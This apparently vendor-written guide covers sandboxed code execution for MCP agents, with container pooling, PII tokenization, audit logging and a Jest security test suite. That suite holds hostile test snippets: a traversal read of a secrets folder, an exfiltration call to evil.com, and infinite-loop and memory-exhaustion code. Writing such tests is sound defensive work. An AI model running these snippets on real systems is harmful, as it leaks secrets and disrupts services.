// Usage: pre-warming can cut cold-start latency from ~2s to ~50ms
// (estimate; benchmark in your own environment)
const docker = new Docker();
const pool = new ContainerPool(docker);
await pool.initialize();

async function executeWithPool(code: string): Promise<string> {
  const container = await pool.acquire();
  try {
    return await executeInContainer(docker, container, code);
  } finally {
    await pool.release(container);
  }
}
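The `acquire` method above polls every 100 ms while the pool is empty. A waiter queue instead hands a released container straight to the next caller, with no polling delay and in first-come order. The generic `ResourcePool<T>` below is our own sketch, independent of Docker; it omits acquire timeouts and health checks.

```typescript
// Generic FIFO pool: release() hands the item directly to the oldest waiter.
class ResourcePool<T> {
  private readonly idle: T[];
  private readonly waiters: Array<(item: T) => void> = [];

  constructor(items: T[]) {
    this.idle = [...items];
  }

  get available(): number {
    return this.idle.length;
  }

  get waiting(): number {
    return this.waiters.length;
  }

  acquire(): Promise<T> {
    const item = this.idle.shift();
    if (item !== undefined) return Promise.resolve(item);
    // Nothing idle: queue the caller until an item is released
    return new Promise<T>((resolve) => this.waiters.push(resolve));
  }

  release(item: T): void {
    const next = this.waiters.shift();
    if (next) next(item); // Direct hand-off, no polling
    else this.idle.push(item);
  }
}

// With a single container, the second caller waits for the first to release it
const pool = new ResourcePool(["container-1"]);
const first = pool.acquire();
const second = pool.acquire();
console.log(pool.available, pool.waiting); // 0 1
first.then((c) => pool.release(c));
second.then((c) => console.log("second caller got", c));
```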

Enterprise Implementation Guidelines

Enterprise deployments require additional considerations around compliance, audit logging, and data privacy that go beyond basic sandboxing.

Privacy-Preserving Execution

Anthropic highlights that code execution supports "privacy-preserving operations by keeping intermediate results in execution environment" and "automatically tokenizing sensitive data." This is critical for enterprise compliance.

TYPESCRIPT
// Privacy-preserving data processing in the execution environment
import { createHash, randomUUID } from 'node:crypto';
import type { Pool } from 'pg';

// Hypothetical sandbox entry point (see the server example earlier)
type ExecuteFn = (code: string) => Promise<unknown>;

class PrivacyPreservingExecutor {
  constructor(private execute: ExecuteFn) {}

  async processCustomerData(customerIds: string[]): Promise<unknown> {
    // Assumes snippets run as async functions with a hypothetical `mcp` global.
    // customerIds is embedded as a JSON literal: the sandbox cannot see host variables.
    const code = `
      const { tokenize } = mcp.privacy;
      const customerIds = ${JSON.stringify(customerIds)};

      // Load customer data inside the execution environment
      // (assumes rows come back with an "orders" array, newest first)
      const customers = await mcp.db.query(
        'SELECT * FROM customers WHERE id = ANY($1)',
        [customerIds]
      );

      // Process without exposing PII to the model
      const insights = customers.map(customer => {
        const orders = customer.orders ?? [];
        const total = orders.reduce((sum, order) => sum + order.total, 0);
        return {
          // Tokenized identifiers stay linkable without revealing real values
          customerId: tokenize(customer.id),
          email: tokenize(customer.email),
          // Aggregate, non-PII insights only
          purchaseCount: orders.length,
          avgOrderValue: orders.length > 0 ? total / orders.length : 0,
          lastPurchase: orders[0]?.date
        };
      });

      // Return aggregated insights only
      const n = insights.length || 1; // Avoid dividing by zero
      return {
        totalCustomers: insights.length,
        avgPurchaseCount: insights.reduce((sum, i) => sum + i.purchaseCount, 0) / n,
        avgOrderValue: insights.reduce((sum, i) => sum + i.avgOrderValue, 0) / n
      };
    `;

    // Execute the code; raw PII is never transmitted to the model
    return this.execute(code);
  }
}

// Audit logging for compliance
// (a type alias, not an interface, so it satisfies pg's row type constraint)
type ComplianceRow = {
  user_id: string;
  execution_count: number;
  unique_tables_accessed: number;
};

class AuditLogger {
  constructor(private db: Pool) {}

  private hashCode(code: string): string {
    return createHash('sha256').update(code).digest('hex');
  }

  private summarizeResult(result: unknown): string {
    // Store a bounded summary, not the full (possibly sensitive) result
    return (JSON.stringify(result) ?? 'undefined').slice(0, 500);
  }

  async logExecution(execution: {
    code: string;
    user: string;
    timestamp: Date;
    durationMs: number;
    dataAccessed: string[];
    result: unknown;
  }): Promise<void> {
    // Comprehensive audit trail
    await this.db.query(
      `INSERT INTO execution_audit_log (
         execution_id, user_id, timestamp, code_hash,
         data_accessed, execution_duration_ms, result_summary
       ) VALUES ($1, $2, $3, $4, $5, $6, $7)`,
      [
        randomUUID(),
        execution.user,
        execution.timestamp,
        this.hashCode(execution.code),
        JSON.stringify(execution.dataAccessed), // Stored in a jsonb column
        execution.durationMs,
        this.summarizeResult(execution.result),
      ]
    );
  }

  // Compliance reporting: per-user execution counts and distinct tables accessed
  async generateComplianceReport(startDate: Date, endDate: Date): Promise<ComplianceRow[]> {
    const { rows } = await this.db.query<ComplianceRow>(
      `SELECT l.user_id,
              COUNT(DISTINCT l.execution_id)::int AS execution_count,
              COUNT(DISTINCT t.accessed_table)::int AS unique_tables_accessed
         FROM execution_audit_log l
         LEFT JOIN LATERAL jsonb_array_elements_text(l.data_accessed)
                AS t(accessed_table) ON true
        WHERE l.timestamp BETWEEN $1 AND $2
        GROUP BY l.user_id`,
      [startDate, endDate]
    );
    return rows;
  }
}
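Anthropic's post describes a client-side form of tokenization: sensitive values are replaced with placeholders before results reach the model, and the real values are swapped back in when the data flows into another tool call. The sketch below shows one way a `tokenize` helper like the `mcp.privacy.tokenize` assumed in the example above might work. `PiiVault`, its `[KIND_N]` token format, and the in-memory maps are hypothetical; kinds are assumed to contain only letters and underscores, and a production version would need durable, access-controlled storage scoped per session.

```typescript
// Hypothetical per-session vault mapping sensitive values to stable placeholders
class PiiVault {
  private readonly byValue = new Map<string, string>();
  private readonly byToken = new Map<string, string>();
  private readonly counters = new Map<string, number>();

  // The same value and kind always yield the same placeholder within this vault
  tokenize(value: string, kind: string): string {
    const key = `${kind}\u0000${value}`;
    const existing = this.byValue.get(key);
    if (existing) return existing;
    const n = (this.counters.get(kind) ?? 0) + 1;
    this.counters.set(kind, n);
    const token = `[${kind.toUpperCase()}_${n}]`;
    this.byValue.set(key, token);
    this.byToken.set(token, value);
    return token;
  }

  // Swap placeholders back to real values just before a downstream tool call;
  // unknown placeholders are left untouched
  detokenize(text: string): string {
    return text.replace(/\[[A-Z_]+_\d+\]/g, (token) => this.byToken.get(token) ?? token);
  }
}

const vault = new PiiVault();
const t1 = vault.tokenize("ana@example.com", "email");
const t2 = vault.tokenize("ana@example.com", "email");
console.log(t1, t1 === t2); // [EMAIL_1] true
console.log(vault.detokenize(`Send the receipt to ${t1}`)); // Send the receipt to ana@example.com
```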

Quality Engineering and Testing

Code execution with MCP introduces new testing requirements beyond traditional MCP server validation. You need to test sandbox escape attempts, resource exhaustion scenarios, and execution correctness.

TYPESCRIPT
// Test suite for the code execution MCP server (Jest).
// Assumes a hypothetical executeCode() that runs snippets as async functions
// with sandbox globals `fs` and `mcp`, and rejects when a snippet throws,
// times out, or is killed.
describe('Code Execution MCP Server', () => {
  describe('Security Tests', () => {
    it('should prevent filesystem traversal attacks', async () => {
      // Uses the sandbox's secured fs global rather than require('fs')
      const maliciousCode = `
        return fs.readdirSync('../../secrets/');
      `;

      await expect(
        executeCode(maliciousCode)
      ).rejects.toThrow('Path access denied');
    });

    it('should prevent network access', async () => {
      const maliciousCode = `
        const https = require('https');
        return new Promise((resolve) => {
          https.get('https://evil.com/exfiltrate', resolve);
        });
      `;

      // Any rejection passes (no require, blocked socket, ...); the exact
      // message depends on how the sandbox blocks the attempt
      await expect(
        executeCode(maliciousCode)
      ).rejects.toThrow();
    });

    // Jest's default per-test timeout is 5s, so this test allows 10s
    it('should enforce execution timeout', async () => {
      const infiniteLoop = `
        while (true) { /* infinite loop */ }
      `;

      const start = Date.now();
      await expect(
        executeCode(infiniteLoop)
      ).rejects.toThrow(/timed out|timeout/i);

      const duration = Date.now() - start;
      expect(duration).toBeLessThan(6000); // 5s timeout + 1s buffer
    }, 10_000);

    it('should enforce memory limits', async () => {
      // Requires process or container isolation: an in-process sandbox such
      // as vm2 shares the host heap and would take the server down instead
      const memoryExhaustion = `
        const arrays = [];
        while (true) {
          arrays.push(new Array(1000000).fill('x'));
        }
      `;

      // Assumes the executor reports an OOM kill with this message
      await expect(
        executeCode(memoryExhaustion)
      ).rejects.toThrow('Memory limit exceeded');
    }, 10_000);
  });

  describe('Correctness Tests', () => {
    it('should execute valid data transformations', async () => {
      const code = `
        const data = [1, 2, 3, 4, 5];
        return data
          .filter(x => x % 2 === 0)
          .map(x => x * 2);
      `;

      const result = await executeCode(code);
      expect(result).toEqual([4, 8]);
    });

    // Only applies if the server keeps per-session state between calls
    it('should preserve execution context across calls', async () => {
      // First execution sets state
      await executeCode(`
        mcp.state.counter = 0;
      `);

      // Second execution reads and increments state
      const result = await executeCode(`
        return ++mcp.state.counter;
      `);

      expect(result).toBe(1);
    });
  });

  describe('Performance Tests', () => {
    it('should complete execution within latency budget', async () => {
      const code = `
        const files = fs.readdirSync('./data');
        return files.filter(f => f.endsWith('.json'));
      `;

      const start = Date.now();
      await executeCode(code);
      const duration = Date.now() - start;

      // 100ms suits an in-process or pre-warmed sandbox; cold containers need more
      expect(duration).toBeLessThan(100);
    });

    it('should handle concurrent executions', async () => {
      const executions = Array.from({ length: 100 }, (_, i) =>
        executeCode(`return ${i} * 2;`)
      );

      const results = await Promise.all(executions);

      // Verify all executions completed correctly and in order
      results.forEach((result, i) => {
        expect(result).toBe(i * 2);
      });
    });
  });

  describe('Integration Tests', () => {
    it('should integrate with MCP filesystem resources', async () => {
      const code = `
        // Access the filesystem through the MCP resource API
        const content = await mcp.resources.read(
          'file:///data/config.json'
        );
        return JSON.parse(content);
      `;

      const result = await executeCode(code);
      // Assert on a non-secret (hypothetical) field: secrets should never reach the model
      expect(result).toHaveProperty('version');
    });

    it('should integrate with MCP database tools', async () => {
      const code = `
        // Query the database through the MCP tool API. COUNT(*) is bigint in
        // Postgres, which node-postgres returns as a string, so cast to int.
        const rows = await mcp.tools.call('db_query', {
          sql: 'SELECT COUNT(*)::int AS count FROM users WHERE active = true'
        });
        return rows[0].count;
      `;

      const result = await executeCode(code);
      expect(typeof result).toBe('number');
    });
  });
});

Future Implications for MCP Infrastructure

Code execution with MCP isn't just an optimization technique—it's a fundamental shift in how we should think about MCP server architecture. The implications extend far beyond token reduction.

Future Architecture Patterns

Composable MCP Capabilities

Code execution enables agents to compose capabilities dynamically rather than requiring pre-defined tool combinations

Higher-Level Abstractions

Build libraries of reusable code patterns that agents can leverage without tool schema overhead

Stateful Agent Workflows

Maintain execution state across multi-step operations without bloating conversation history

Edge Computing Patterns

Process data closer to its source, transmitting only insights to the model rather than raw data

As MCP ecosystems mature, code execution is likely to become a standard capability rather than an advanced pattern. For complex multi-agent systems operating at scale, savings on the order of Anthropic's 98.7% example are more than impressive; they can decide whether a workflow is economically viable at all.

The challenge for infrastructure teams is implementing secure, performant code execution environments before they become a competitive requirement. Organizations that master this pattern early will have significant advantages in building sophisticated AI systems that remain cost-effective at scale.

Need Help Implementing Code Execution with MCP?

Building production-ready code execution infrastructure requires deep expertise in sandboxing, Kubernetes orchestration, and MCP architecture patterns. Let's discuss your implementation strategy.